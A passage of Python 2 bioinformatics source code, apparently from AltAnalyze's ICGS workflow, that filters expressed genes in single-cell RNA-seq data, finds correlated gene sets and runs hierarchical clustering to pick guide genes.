if 'rpl'==symbol[:3] or 'rps'==symbol[:3] or 'mt-'==symbol[:3] or '.' in symbol or 'gm'==symbol[:2]:
coding_type = 'ncRNA'
try: gene_db = custom_annotation_dbase[coding_type]; gene_db[gene]=[]
except Exception: custom_annotation_dbase[coding_type] = {gene:[]}
filename = 'AltDatabase/uniprot/'+species+'/custom_annotations.txt'
fn=filepath(filename)
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
ens_gene,compartment,custom_class = t[:3]
if 'GPCR' in custom_class:
custom_class = ['GPCR']
else:
custom_class = string.split(custom_class,'|')
custom_class = string.split(compartment,'|')+custom_class
for cc in custom_class:
try: gene_db = custom_annotation_dbase[cc]; gene_db[ens_gene]=[]
except Exception: custom_annotation_dbase[cc] = {ens_gene:[]}
#custom_annotation_dbase={}
try:
filename = 'AltDatabase/goelite/'+species+'/gene-mapp/Ensembl-BioMarkers.txt'
fn=filepath(filename)
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
gene,null,celltype = t[:3]
try: gene_db = custom_annotation_dbase['BioMarker']; gene_db[gene]=[]
except Exception: custom_annotation_dbase['BioMarker'] = {gene:[]}
#print len(custom_annotation_dbase), 'gene classes imported'
except Exception: pass
return custom_annotation_dbase
def importGeneSets(geneSetType,filterType=None,geneAnnotations=None,speciesName=None):
try: speciesName = species
except: pass
gene_db={}
if 'Ontology' in geneSetType:
filename = 'AltDatabase/goelite/'+speciesName+'/nested/Ensembl_to_Nested-GO.txt'
ontology=True
else:
filename = 'AltDatabase/goelite/'+speciesName+'/gene-mapp/Ensembl-'+geneSetType+'.txt'
ontology=False
fn=filepath(filename)
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if ontology:
gene,category = t
else: gene,null,category = t[:3]
if filterType==None:
try: gene_db[gene].append(category)
except Exception: gene_db[gene] = [category]
elif filterType in category:
if gene in geneAnnotations:
gene = geneAnnotations[gene][0]
gene_db[gene]=[]
return gene_db
def singleCellRNASeqWorkflow(Species, platform, expFile, mlp, exp_threshold=0, rpkm_threshold=5, drivers=False, parameters = None, reportOnly=False):
global species
global rho_cutoff
species = Species
removeOutliers = False
if parameters != None:
rpkm_threshold = parameters.ExpressionCutoff()
exp_threshold = parameters.CountsCutoff()
rho_cutoff = parameters.RhoCutoff()
restrictBy = parameters.RestrictBy()
try: removeOutliers = parameters.RemoveOutliers()
except Exception: pass
if platform == 'exons' or platform == 'PSI':
rpkm_threshold=0
exp_threshold=0
else:
rho_cutoff = 0.4
restrictBy = 'protein_coding'
onlyIncludeDrivers=True
if platform != 'exons' and platform != 'PSI':
platform = checkExpressionFileFormat(expFile,platform)
if platform != 'RNASeq':
if rpkm_threshold>1.9999:
rpkm_threshold = math.log(rpkm_threshold,2) ### log2 transform
if removeOutliers:
### Remove samples with low relative number of genes expressed
try:
print '***Removing outlier samples***'
from import_scripts import sampleIndexSelection
reload(sampleIndexSelection)
output_file = expFile[:-4]+'-OutliersRemoved.txt'
sampleIndexSelection.statisticallyFilterFile(expFile,output_file,rpkm_threshold)
if 'exp.' in expFile:
### move the original groups and comps files
groups_file = string.replace(expFile,'exp.','groups.')
groups_file = string.replace(groups_file,'-steady-state','')
groups_filtered_file = groups_file[:-4]+'-OutliersRemoved.txt'
#comps_file = string.replace(groups_file,'groups.','comps.')
#comps_filtered_file = string.replace(groups_filtered_file,'groups.','comps.')
#counts_file = string.replace(expFile,'exp.','counts.')
#counts_filtered_file = string.replace(output_file,'exp.','counts.')
try: shutil.copyfile(groups_file,groups_filtered_file) ### if present copy over
except Exception: pass
try: shutil.copyfile(comps_file,comps_filtered_file) ### if present copy over
except Exception: pass
#try: shutil.copyfile(counts_file,counts_filtered_file) ### if present copy over
#except Exception: pass
expFile = output_file
print ''
except Exception:
print '***Filtering FAILED***'
print traceback.format_exc()
expressed_uids_rpkm = getMaxCounts(expFile,rpkm_threshold)
try: expressed_uids_counts = getMaxCounts(string.replace(expFile,'exp.','counts.'),exp_threshold)
except Exception: expressed_uids_counts=expressed_uids_rpkm
if len(expressed_uids_counts) > 0:
try: expressed_uids = expressed_uids_rpkm.viewkeys() & expressed_uids_counts.viewkeys() ### common
except Exception: expressed_uids = getOverlappingKeys(expressed_uids_rpkm,expressed_uids_counts)
else:
expressed_uids = expressed_uids_rpkm
if reportOnly:
print '.',
else:
print 'Genes filtered by counts:',len(expressed_uids_counts)
print 'Genes filtered by expression:',len(expressed_uids_rpkm),len(expressed_uids)
#expressed_uids = filterByProteinAnnotation(species,expressed_uids)
print len(expressed_uids), 'expressed genes by RPKM/TPM (%d) and counts (%d)' % (rpkm_threshold,exp_threshold)
from import_scripts import OBO_import; import ExpressionBuilder
gene_to_symbol_db = ExpressionBuilder.importGeneAnnotations(species)
try: biological_categories = importBiologicalRelationships(species)
except Exception:
restrictBy = None
biological_categories={}
print 'Missing annotation file in:','AltDatabase/uniprot/'+species+'/custom_annotations.txt !!!!!'
if restrictBy !=None:
if reportOnly:
print '.',
else:
print 'Attempting to restrict analysis to protein coding genes only (flag --RestrictBy protein_coding)'
genes = biological_categories['protein_coding']
genes_temp=dict(genes)
for gene in genes_temp:
if gene in gene_to_symbol_db:
genes[gene_to_symbol_db[gene][0]]=[] ### add symbols
genes_temp={}
else:
genes = {}
for i in expressed_uids: genes[i]=[]
"""
genes.update(biological_categories['BioMarker'])
genes.update(biological_categories['transcription regulator'])
genes.update(biological_categories['splicing regulator'])
genes.update(biological_categories['kinase'])
genes.update(biological_categories['GPCR'])
"""
expressed_uids_db={}; guide_genes={}
for id in expressed_uids: expressed_uids_db[id]=[]
if platform == 'exons' or platform == 'PSI': ### For splicing-index value filtering
expressed_uids=[]
for uid in expressed_uids_db:
geneID = string.split(uid,':')[0]
geneID = string.split(geneID,' ')[-1]
if geneID in genes: expressed_uids.append(uid)
else:
expressed_uids2=[]
for gene in expressed_uids:
ADT_status = check_for_ADT(gene)
if ADT_status:
expressed_uids2.append(gene)
elif gene in genes:
expressed_uids2.append(gene)
expressed_uids = expressed_uids2
expressed_uids_db2={}
for id in expressed_uids: expressed_uids_db2[id]=[]
if drivers != False:
guide_genes = getDrivers(drivers)
if onlyIncludeDrivers:
try: expressed_uids = guide_genes.viewkeys() & expressed_uids_db2.viewkeys() ### common
except Exception: expressed_uids = getOverlappingKeys(guide_genes,expressed_uids_db2)
if len(expressed_uids)<100:
print '\nNOTE: The input IDs do not sufficiently map to annotated protein coding genes...',
print 'skipping protein coding annotation filtering.'
expressed_uids=[]
for uid in expressed_uids_db:
expressed_uids.append(uid)
if reportOnly:
print '.',
else:
print len(expressed_uids), 'expressed IDs being further analyzed'
print_out,n = findCommonExpressionProfiles(expFile,species,platform,expressed_uids,guide_genes,mlp,parameters=parameters,reportOnly=reportOnly)
return print_out,n
def getOverlappingKeys(db1,db2):
db3=[]
for key in db1:
if key in db2:
db3.append(key)
return db3
def getDrivers(filename):
fn = filepath(filename)
firstLine=True
drivers={}
for line in open(fn,'rU').xreadlines():
line = line.rstrip()
t = string.split(line,'\t')
if firstLine: firstLine = False
else:
gene = t[0]
drivers[gene]=[]
print 'Imported %d guide genes' % len(drivers)
return drivers
def filterByProteinAnnotation(species,expressed_uids):
import ExpressionBuilder
custom_annotation_dbase = ExpressionBuilder.importTranscriptBiotypeAnnotations(species)
expressed_uids_protein=[]
for gene in expressed_uids:
if gene in custom_annotation_dbase:
compartment,custom_class = custom_annotation_dbase[gene]
if 'protein_coding' in custom_class:
expressed_uids_protein.append(gene)
if len(expressed_uids_protein)>10:
return expressed_uids_protein
else:
return expressed_uids
def CoeffVar(expFile,platform,expressed_uids,fold=2,samplesDiffering=2,guideGenes=[]):
firstLine=True
expressed_values={}
expressed_values_filtered={}
cv_list=[]
for line in open(expFile,'rU').xreadlines():
key = string.split(line,'\t')[0]
t = string.split(line,'\t')
if firstLine:
headers = line
firstLine = False
else:
try: uid, coordinates = string.split(key,'=')
except Exception: uid = key
values = map(lambda x: float(x), t[1:])
#gene = string.split(uid,':')[0]
if uid in expressed_uids:
vs = list(values); vs.sort()
cv = statistics.stdev(values)/statistics.avg(values)
if samplesDiffering<1: samplesDiffering=1
if platform == 'RNASeq':
if (vs[-1*samplesDiffering]/vs[samplesDiffering])>fold: ### Ensures that atleast 4 samples are significantly different in the set
expressed_values[uid] = values
cv_list.append((cv,uid))
else:
if (vs[-1*samplesDiffering]-vs[samplesDiffering])>fold: ### Ensures that atleast 4 samples are significantly different in the set
expressed_values[uid] = values
cv_list.append((cv,uid))
if uid in guideGenes:
expressed_values[uid] = values
cv_list.append((10000,uid)) ### Very high CV
cv_list.sort()
cv_list.reverse()
x=0
for (cv,uid) in cv_list:
x+=1
"""
if uid == 'ENSMUSG00000003882':
print x, 'ilr7'
"""
for (cv,uid) in cv_list[:5000]:
expressed_values_filtered[uid] = expressed_values[uid]
return expressed_values_filtered, fold, samplesDiffering, headers
def determinePattern(vs):
max_vs = max(vs)
min_vs = min(vs)
lower_max = max_vs - (max_vs*0.01)
upper_min = abs(max_vs)*0.01
s = bisect.bisect_right(vs,upper_min) ### starting low 15% index position
e = bisect.bisect_left(vs,lower_max) ### ending upper 85% index position
#print vs
#print max_vs, min_vs
#print lower_max, upper_min
#print s, e
avg = statistics.avg(vs[s:e+1])
m = bisect.bisect_left(vs,avg)
ratio = vs[m]/vs[((e-s)/2)+s-2] ### If the ratio is close to 1, a sigmoidal or linear pattern likely exists
print ratio
#sys.exit()
return ratio
def checkExpressionFileFormat(expFile,platform):
firstLine=True
inputMax=0; inputMin=10000
expressed_values={}
rows=0
for line in open(expFile,'rU').xreadlines():
key = string.split(line,'\t')[0]
t = string.split(line,'\t')
if firstLine:
headers = line
firstLine = False
else:
try: uid, coordinates = string.split(key,'=')
except Exception: uid = key
try: values = map(lambda x: float(x), t[1:])
except Exception:
values=[]
for value in t[1:]:
try: values.append(float(value))
except Exception:pass
try:
if max(values)>inputMax: inputMax = max(values)
except Exception:
pass
if inputMax>100:
break
if inputMax>100: ### Thus, not log values
platform = 'RNASeq'
else:
platform = "3'array"
return platform
def optimizeNumberOfGenesForDiscovery(expFile,platform,expressed_uids,fold=2,samplesDiffering=2,guideGenes=[],reportOnly=False):
firstLine=True
expressed_values={}
for line in open(expFile,'rU').xreadlines():
key = string.split(line,'\t')[0]
t = string.split(line,'\t')
if firstLine:
headers = line
firstLine = False
else:
try: uid, coordinates = string.split(key,'=')
except Exception: uid = key
try: values = map(lambda x: float(x), t[1:])
except Exception:
values = t[1:]
if 'NA' in values:
values = [0 if x=='NA' else x for x in values] ### Replace NAs
values = map(lambda x: float(x), values)
else:
values=[]
for value in t[1:]:
try: values.append(float(value))
except Exception: values.append(-9999)
values = numpy.ma.masked_values(values, -9999.)
#gene = string.split(uid,':')[0]
#if uid == 'ENSMUSG00000041515': print 'IRF8'
if uid in expressed_uids:
#slope_exp_ratio = determinePattern(vs)
#if slope_exp_ratio<2 and slope_exp_ratio>0.5:
if platform == 'RNASeq':
try: values = map(lambda x: math.log(x+1,2),values)
except Exception:
if 'NA' in values:
values = [0 if x=='NA' else x for x in values] ### Replace NAs
values = map(lambda x: math.log(x+1,2),values)
elif '' in values:
values = [0 if x=='' else x for x in values] ### Replace NAs
values = map(lambda x: math.log(x+1,2),values)
vs = list(values); vs.sort()
if (vs[-1*samplesDiffering]-vs[samplesDiffering-1])>math.log(fold,2): ### Ensures that atleast 4 samples are significantly different in the set
if reportOnly==False:
expressed_values[uid] = values
else:
expressed_values[uid]=[] ### Don't store the values - datasets can contain tens of thousands of
else:
vs = list(values); vs.sort()
if (vs[-1*samplesDiffering]-vs[samplesDiffering-1])>math.log(fold,2): ### Ensures that atleast 4 samples are significantly different in the set
if reportOnly==False:
expressed_values[uid] = values
else:
expressed_values[uid]=[]
if uid in guideGenes:
expressed_values[uid] = values
#if uid == 'ENSMUSG00000062825': print (vs[-1*samplesDiffering]-vs[samplesDiffering]),math.log(fold,2);sys.exit()
if reportOnly:
print '.',
else:
print len(expressed_uids),'genes examined and', len(expressed_values),'genes expressed for a fold cutoff of', fold
if len(expressed_uids)==0 or len(expressed_values)==0:
print options_result_in_no_genes
elif len(expressed_uids) < 50 and len(expressed_values)>0:
return expressed_values, fold, samplesDiffering, headers
elif len(expressed_values)>15000:
if platform == 'exons' or platform == 'PSI':
fold+=0.1
else:
fold+=1
samplesDiffering+=1
expressed_values, fold, samplesDiffering, headers = optimizeNumberOfGenesForDiscovery(expFile,platform,expressed_uids,fold=fold,samplesDiffering=samplesDiffering,guideGenes=guideGenes,reportOnly=reportOnly)
elif fold == 1.2 and samplesDiffering == 1:
return expressed_values, fold, samplesDiffering, headers
elif len(expressed_values)<50:
fold-=0.2
samplesDiffering-=1
if samplesDiffering<1: samplesDiffering = 1
if fold < 1.1: fold = 1.2
expressed_values, fold, samplesDiffering, headers = optimizeNumberOfGenesForDiscovery(expFile,platform,expressed_uids,fold=fold,samplesDiffering=samplesDiffering,guideGenes=guideGenes,reportOnly=reportOnly)
else:
return expressed_values, fold, samplesDiffering, headers
return expressed_values, fold, samplesDiffering, headers
def intraCorrelation(expressed_values,mlp):
if mlp.cpu_count() < 3:
processors = mlp.cpu_count()
else: processors = 8
pool = mlp.Pool(processes=processors)
si = (len(expressed_values)/processors)
s = si; b=0
db_ls=[]
if len(expressed_values)<10: forceError ### will si to be zero and an infanite loop
while s<len(expressed_values):
db_ls.append(dict(expressed_values.items()[b:s]))
b+=si; s+=si
db_ls.append(dict(expressed_values.items()[b:s]))
### Create an instance of MultiZscoreWorker (store the variables to save memory)
workerMulti = MultiCorrelatePatterns(expressed_values)
results = pool.map(workerMulti,db_ls)
#for i in db_ls: workerMulti(i)
pool.close(); pool.join(); pool = None
correlated_genes={}
for a in results:
for k in a: correlated_genes[k] = a[k]
return correlated_genes
def findCommonExpressionProfiles(expFile,species,platform,expressed_uids,guide_genes,mlp,fold=2,samplesDiffering=2,parameters=None,reportOnly=False):
use_CV=False
global rho_cutoff
row_metric = 'correlation'; row_method = 'average'
column_metric = 'cosine'; column_method = 'hopach'
original_column_metric = column_metric
original_column_method = column_method
color_gradient = 'yellow_black_blue'; transpose = False; graphic_links=[]
if parameters != None:
try: excludeGuides = parameters.ExcludeGuides() ### Remove signatures
except Exception: excludeGuides = None
fold = parameters.FoldDiff()
samplesDiffering = parameters.SamplesDiffering()
amplifyGenes = parameters.amplifyGenes()
if 'Guide' in parameters.GeneSelection():
amplifyGenes = False ### This occurs when running ICGS with the BOTH option, in which Guide3 genes are retained - ignore these
parameters.setGeneSelection('')
parameters.setClusterGOElite('')
excludeCellCycle = parameters.ExcludeCellCycle()
from visualization_scripts import clustering
row_metric = 'correlation'; row_method = 'average'
column_metric = parameters.ColumnMetric(); column_method = parameters.ColumnMethod()
original_column_metric = column_metric
original_column_method = column_method
color_gradient = 'yellow_black_blue'; graphic_links=[]
if platform == 'exons' or platform =='PSI': color_gradient = 'yellow_black_blue'
guide_genes = parameters.JustShowTheseIDs()
cell_cycle_id_list = []
else:
amplifyGenes = False
excludeCellCycle = False
if platform != 'exons'and platform !='PSI':
platform = checkExpressionFileFormat(expFile,platform)
else:
if LegacyMode: pass
else:
fold = math.pow(2,0.5)
fold = 1.25
#"""
if use_CV:
expressed_values, fold, samplesDiffering, headers = CoeffVar(expFile,platform,expressed_uids,fold=2,samplesDiffering=2,guideGenes=guide_genes)
else:
if reportOnly:
print '.',
else:
print 'Finding an optimal number of genes based on differing thresholds to include for clustering...'
#fold=1; samplesDiffering=1
expressed_values, fold, samplesDiffering, headers = optimizeNumberOfGenesForDiscovery(expFile,platform,expressed_uids,fold=fold,samplesDiffering=samplesDiffering,guideGenes=guide_genes,reportOnly=reportOnly) #fold=2,samplesDiffering=2
if reportOnly:
print '.',
else:
print 'Evaluating',len(expressed_values),'genes, differentially expressed',fold,'fold for at least',samplesDiffering*2,'samples'
#sys.exit()
from import_scripts import OBO_import; import ExpressionBuilder
gene_to_symbol_db = ExpressionBuilder.importGeneAnnotations(species)
symbol_to_gene = OBO_import.swapKeyValues(gene_to_symbol_db)
areYouSure=False
if (excludeCellCycle == 'strict' or excludeCellCycle == True) and areYouSure:
cc_param = copy.deepcopy(parameters)
cc_param.setPathwaySelect('cell cycle')
cc_param.setGeneSet('GeneOntology')
cc_param.setGeneSelection('amplify')
transpose = cc_param
filtered_file = export.findParentDir(expFile)+'/amplify/'+export.findFilename(expFile)
writeFilteredFile(filtered_file,platform,headers,{},expressed_values,[])
if len(expressed_values)<1000:
row_method = 'hopach'; row_metric = 'correlation'
if column_method != 'hopach': row_method = 'average' ### needed due to PC errors
if len(headers)>7000: ### For very ultra-large datasets
column_method = 'average'
cc_graphic_links = clustering.runHCexplicit(filtered_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, transpose, display=False, Normalize=True, JustShowTheseIDs=guide_genes)
cell_cycle_id_list = genericRowIDImport(string.replace(cc_graphic_links[0][-1],'.png','.txt'))
expressed_values2 = {}
for id in expressed_values:
try: symbolID = gene_to_symbol_db[id][0]
except Exception: symbolID = id
if id not in cell_cycle_id_list and symbolID not in cell_cycle_id_list:
expressed_values2[id]=expressed_values[id]
print len(expressed_values)-len(expressed_values2),'cell-cycle associated genes removed for cluster discovery'
expressed_values = expressed_values2
if reportOnly==False:
print 'amplifyGenes:',amplifyGenes
### Write out filtered list to amplify and to filtered.YourExperiment.txt
filtered_file = export.findParentDir(expFile)+'/amplify/'+export.findFilename(expFile)
groups_file = string.replace(expFile,'exp.','groups.')
groups_filtered_file = string.replace(filtered_file,'exp.','groups.')
groups_file = string.replace(groups_file,'-steady-state','')
groups_filtered_file = string.replace(groups_filtered_file,'-steady-state','')
if reportOnly==False:
try: export.customFileCopy(groups_file,groups_filtered_file) ### if present copy over
except Exception: pass
writeFilteredFile(filtered_file,platform,headers,{},expressed_values,[])
filtered_file_new = string.replace(expFile,'exp.','filteredExp.')
try: export.customFileCopy(filtered_file,filtered_file_new) ### if present copy over
except Exception: pass
else:
filtered_file = writeFilteredFileReimport(expFile,platform,headers,expressed_values) ### expressed_values just contains the UID
print_out = '%d genes, differentially expressed %d fold for at least %d samples' % (len(expressed_values), fold, samplesDiffering*2)
return print_out, filtered_file
if len(expressed_values)<1400 and column_method == 'hopach':
row_method = 'hopach'; row_metric = 'correlation'
else:
row_method = 'weighted'; row_metric = 'cosine'
if amplifyGenes:
transpose = parameters
try:
if len(parameters.GeneSelection())>0:
parameters.setGeneSelection(parameters.GeneSelection()+' amplify')
print 'Finding correlated genes to the input geneset(s)...'
else:
print 'Finding intra-correlated genes from the input geneset(s)...'
parameters.setGeneSelection(parameters.GeneSelection()+' IntraCorrelatedOnly amplify')
except Exception:
parameters.setGeneSelection(parameters.GeneSelection()+' IntraCorrelatedOnly amplify')
print 'Finding intra-correlated genes from the input geneset(s)...'
if column_method != 'hopach': row_method = 'average' ### needed due to PC errors
graphic_links = clustering.runHCexplicit(filtered_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, transpose, display=False, Normalize=True, JustShowTheseIDs=guide_genes)
#return graphic_links
from visualization_scripts import clustering
matrix, column_header, row_header, dataset_name, group_db = clustering.importData(graphic_links[-1][-1][:-4]+'.txt')
headers = ['UID']+column_header
expressed_values2={}
for i in row_header: ### Filter the expressed values for the intra-correlated queried gene set and replace
try: expressed_values2[i]=expressed_values[i]
except Exception:
try:
e = symbol_to_gene[i][0]
expressed_values2[e]=expressed_values[e]
except Exception:
pass
expressed_values = expressed_values2
print 'Looking for common gene expression profiles for class assignment...',
begin_time = time.time()
useNumpyCorr=True
negative_rho = rho_cutoff*-1
#results_file = string.replace(expFile[:-4]+'-CORRELATED-FEATURES.txt','exp.','/SamplePrediction/')
#eo = export.ExportFile(results_file[:-4]+'-genes.txt')
if useNumpyCorr:
row_ids=[]
x = []
for id in expressed_values:
row_ids.append(id)
x.append(expressed_values[id])
#if id== 'Bcl2l11': print expressed_values[id];sys.exit()
D1 = numpy.corrcoef(x)
print 'initial correlations obtained'
i=0
correlated_genes={}
if 'exons' == platform or 'PSI' == platform:
for score_ls in D1:
proceed = True
correlated = []
geneID = row_ids[i]
refgene = string.split(geneID,':')[0]
k=0
if excludeGuides!=None:
if geneID in excludeGuides: ### skip this main event
proceed=False
continue
for v in score_ls:
if v>rho_cutoff:# or v<negative_rho:
if refgene not in row_ids[k]:
correlated.append((v,row_ids[k]))
if excludeGuides!=None:
if row_ids[k] in excludeGuides: ### skip this main event
proceed=False
break
k+=1
correlated.sort()
if LegacyMode == False:
correlated.reverse()
if proceed:
correlated = map(lambda x:x[1],correlated)
correlated_genes[geneID] = correlated
i+=1
else:
for score_ls in D1:
correlated = []
geneID = row_ids[i]
k=0; temp=[]
for v in score_ls:
if v>rho_cutoff:# or v<negative_rho:
#scores.append((v,row_ids[k]))
correlated.append((v,row_ids[k]))
#temp.append((geneID,row_ids[k],str(v)))
k+=1
correlated.sort()
if LegacyMode == False:
correlated.reverse()
correlated = map(lambda x:x[1],correlated)
if len(correlated)>0:
correlated_genes[geneID] = correlated
#for (a,b,c) in temp: eo.write(a+'\t'+b+'\t'+c+'\n')
i+=1
else:
### Find common patterns now
performAllPairwiseComparisons = True
if performAllPairwiseComparisons:
correlated_genes = intraCorrelation(expressed_values,mlp)
print len(correlated_genes), 'highly correlated genes found for downstream clustering.'
else: correlated_genes={}
atleast_10={}
if len(correlated_genes)<70: connections = 0
elif len(correlated_genes)<110: connections = 4
else: connections = 5
numb_corr=[]
for i in correlated_genes:
if len(correlated_genes[i])>connections:
numb_corr.append([len(correlated_genes[i]),i])
atleast_10[i]=correlated_genes[i] ### if atleast 10 genes apart of this pattern
x=0
for k in correlated_genes[i]:
if x<30: ### cap it at 30
try: atleast_10[k]=correlated_genes[k] ### add all correlated keys and values
except Exception: pass
elif k not in atleast_10:
ADT_status = check_for_ADT(k)
if ADT_status:
try: atleast_10[k]=correlated_genes[k] ### add all correlated keys and values
except Exception: pass
x+=1
if len(atleast_10)<30:
print 'Initial correlated set too small, getting anything correlated'
for i in correlated_genes:
if len(correlated_genes[i])>0:
numb_corr.append([len(correlated_genes[i]),i])
try: atleast_10[i]=correlated_genes[i] ### if atleast 10 genes apart of this pattern
except Exception: pass
for k in correlated_genes[i]:
try: atleast_10[k]=correlated_genes[k] ### add all correlated keys and values
except Exception: pass
if len(atleast_10) == 0:
atleast_10 = expressed_values
#eo.close()
print len(atleast_10), 'genes correlated to multiple other members (initial filtering)'
### go through the list from the most linked to the least linked genes, only reported the most linked partners
if len(atleast_10)>5000:
print '\n'
return print_out,atleast_10
removeOutlierDrivenCorrelations=True
exclude_corr=[]
numb_corr.sort(); numb_corr.reverse()
numb_corr2=[]
#print len(numb_corr)
if removeOutlierDrivenCorrelations and samplesDiffering != 1:
for key in numb_corr: ### key gene
associations,gene = key
temp_corr_matrix_db={}; rows=[]; temp_corr_matrix=[]
gene_exp_vals = list(expressed_values[gene]) ### copy the list
max_index = gene_exp_vals.index(max(gene_exp_vals))
del gene_exp_vals[max_index]
#temp_corr_matrix.append(exp_vals); rows.append(gene)
#if 'ENSG00000016082' in correlated_genes[gene] or 'ENSG00000016082' == gene: print gene_to_symbol_db[gene],associations
if gene not in exclude_corr:
#print len(correlated_genes[gene])
for k in correlated_genes[gene]:
exp_vals = list(expressed_values[k]) ### copy the list
#print exp_vals
del exp_vals[max_index]
#temp_corr_matrix.append(exp_vals); rows.append(gene)
#print exp_vals,'\n'
temp_corr_matrix_db[k]=exp_vals
temp_corr_matrix.append(exp_vals); rows.append(gene)
correlated_hits = pearsonCorrelations(gene_exp_vals,temp_corr_matrix_db)
try: avg_corr = numpyCorrelationMatrix(temp_corr_matrix,rows,gene)
except Exception: avg_corr = 0
#if gene_to_symbol_db[gene][0] == 'ISL1' or gene_to_symbol_db[gene][0] == 'CD10' or gene_to_symbol_db[gene][0] == 'POU3F2':
if len(correlated_hits)>0:
if LegacyMode:
if (float(len(correlated_hits))+1)/len(correlated_genes[gene])<0.5 or avg_corr<rho_cutoff: ### compare to the below
pass
else:
numb_corr2.append([len(correlated_hits),gene])
else:
if (float(len(correlated_hits))+1)/len(correlated_genes[gene])<0.5 or avg_corr<(rho_cutoff-0.1):
#exclude_corr.append(key)
#if gene == 'XXX': print len(correlated_hits),len(correlated_genes[gene]), avg_corr, rho_cutoff-0.1
pass
else:
numb_corr2.append([len(correlated_hits),gene])
#print (float(len(correlated_hits))+1)/len(correlated_genes[gene]), len(correlated_genes[gene]), key
numb_corr = numb_corr2
numb_corr.sort(); numb_corr.reverse()
#print len(numb_corr)
exclude_corr={}; new_filtered_set={}
limit=0
for key in numb_corr: ### key gene
associations,gene = key
#if 'ENSG00000016082' in correlated_genes[gene] or 'ENSG00000016082' == gene: print gene_to_symbol_db[gene],associations
if gene not in exclude_corr:
for k in correlated_genes[gene]:
exclude_corr[k]=[]
new_filtered_set[k]=[]
new_filtered_set[gene]=[]
limit+=1
#print key
#if limit==1: break
atleast_10 = new_filtered_set
addMultipleDrivers=True
if len(guide_genes)>0 and addMultipleDrivers: ### Artificially weight the correlated genes with known biological driverse
for gene in guide_genes:
y=1
while y<2:
if y==1:
try: atleast_10[gene]=expressed_values[gene]
except Exception: break
else:
try: atleast_10[gene+'-'+str(y)]=expressed_values[gene]
except Exception: break
expressed_values[gene+'-'+str(y)]=expressed_values[gene] ### Add this new ID to the database
#print gene+'-'+str(y)
y+=1
#atleast_10 = expressed_values
results_file = string.replace(expFile[:-4]+'-CORRELATED-FEATURES.txt','exp.','/SamplePrediction/')
writeFilteredFile(results_file,platform,headers,gene_to_symbol_db,expressed_values,atleast_10)
print len(atleast_10),'final correlated genes'
end_time = time.time()
print 'Initial clustering completed in',int(end_time-begin_time),'seconds'
results_file = string.replace(expFile[:-4]+'-CORRELATED-FEATURES.txt','exp.','/SamplePrediction/')
if len(atleast_10)<1200 and column_method == 'hopach':
row_method = 'hopach'; row_metric = 'correlation'
else:
if LegacyMode:
row_method = 'average'; row_metric = 'euclidean'
else:
row_method = 'weighted'; row_metric = 'cosine'
#print row_method, row_metric
correlateByArrayDirectly = False
if correlateByArrayDirectly:
from visualization_scripts import clustering
matrix, column_header, row_header, dataset_name, group_db = clustering.importData(results_file)
new_column_header = map(lambda x: int(x[5:]),column_header)
matrix = [new_column_header]+matrix
matrix = zip(*matrix) ### transpose
exp_sample_db={}
for sample_data in matrix:
exp_sample_db[sample_data[0]] = sample_data[1:]
correlated_arrays = intraCorrelation(exp_sample_db,mpl)
print len(correlated_arrays), 'highly correlated arrays from gene subsets.'
mimum_corr_arrays={}
for i in correlated_arrays:
if len(correlated_arrays[i])>1:
linked_lists=correlated_arrays[i]+[i]
for k in correlated_arrays[i]:
linked_lists+=correlated_arrays[k]
linked_lists = unique.unique(linked_lists)
linked_lists.sort()
# print len(linked_lists), linked_lists
else:
try:
from visualization_scripts import clustering
if platform == 'exons': color_gradient = 'yellow_black_blue'
transpose = False
if column_method != 'hopach': row_method = 'average' ### needed due to PC errors (possibly outside of LegacyMode)
graphic_links = clustering.runHCexplicit(results_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, transpose, display=False, Normalize=True, JustShowTheseIDs=guide_genes)
if len(graphic_links)==0:
graphic_links = clustering.runHCexplicit(results_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, transpose, display=False, Normalize=True, JustShowTheseIDs=guide_genes)
cluster_file = string.replace(graphic_links[0][1],'.png','.txt')
except Exception: pass
#exportGroupsFromClusters(cluster_file,expFile,platform)
#"""
#filtered_file = export.findParentDir(expFile)+'/amplify/'+export.findFilename(expFile)
#graphic_links = [(1,'/Users/saljh8/Desktop/Grimes/KashishNormalization/test/ExpressionInput/SamplePrediction/DataPlots/Clustering-CombinedSingleCell_March_15_2015-CORRELATED-FEATURES-hierarchical_cosine_euclidean.txt')]
try: graphic_links,new_results_file = correlateClusteredGenes(platform,graphic_links[-1][-1][:-4]+'.txt',numSamplesClustered=samplesDiffering,excludeCellCycle=excludeCellCycle,graphics=graphic_links,ColumnMethod=column_method)
except Exception: print traceback.format_exc()
row_metric = 'correlation'; row_method = 'hopach'
#column_metric = 'cosine'
#if LegacyMode: column_method = 'hopach'
cellCycleRemove1=[]; cellCycleRemove2=[]
try:
newDriverGenes1, cellCycleRemove1 = correlateClusteredGenes(platform,graphic_links[-1][-1][:-4]+'.txt',stringency='strict',numSamplesClustered=samplesDiffering,excludeCellCycle=excludeCellCycle,ColumnMethod=column_method)
newDriverGenes1_str = 'Guide1 '+string.join(newDriverGenes1.keys(),' ')+' amplify positive'
parameters.setGeneSelection(newDriverGenes1_str) ### force correlation to these targetGenes
parameters.setGeneSet('None Selected') ### silence this
parameters.setPathwaySelect('None Selected')
if column_method != 'hopach': row_method = 'average' ### needed due to PC errors
graphic_links = clustering.runHCexplicit(filtered_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, parameters, display=False, Normalize=True)
newDriverGenes2, cellCycleRemove2 = correlateClusteredGenes(platform,graphic_links[-1][-1][:-4]+'.txt',stringency='strict',numSamplesClustered=samplesDiffering,excludeCellCycle=excludeCellCycle,ColumnMethod=column_method)
newDriverGenes2_str = 'Guide2 '+string.join(newDriverGenes2.keys(),' ')+' amplify positive'
parameters.setGeneSelection(newDriverGenes2_str) ### force correlation to these targetGenes
parameters.setGeneSet('None Selected') ### silence this
parameters.setPathwaySelect('None Selected')
graphic_links = clustering.runHCexplicit(filtered_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, parameters, display=False, Normalize=True)
newDriverGenes3 = unique.unique(newDriverGenes1.keys()+newDriverGenes2.keys())
